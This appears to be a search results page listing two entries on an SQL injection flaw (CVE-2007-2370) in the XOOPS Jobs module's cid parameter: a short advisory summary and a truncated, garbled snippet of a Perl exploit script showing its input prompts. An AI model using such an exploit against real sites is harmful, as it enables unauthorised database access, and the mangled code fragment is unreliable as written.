2 matches found
XOOPS Module Jobs Remote SQL Injection (CVE-2007-2370)
An SQL injection vulnerability has been reported in Xoops John Mordo Jobs Module. An attacker could exploit this vulnerability via the cid parameter in a jobsview action. Successful exploitation of this vulnerability would allow a remote attacker to execute arbitrary SQL commands on the affected...
XOOPS Module Jobs 2.4 - cid SQL Injection
XOOPS Module Jobs 2.4 - cid SQL Injection !/usr/bin/perl Script Name: XOOPS Module Jobs : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id; $target =...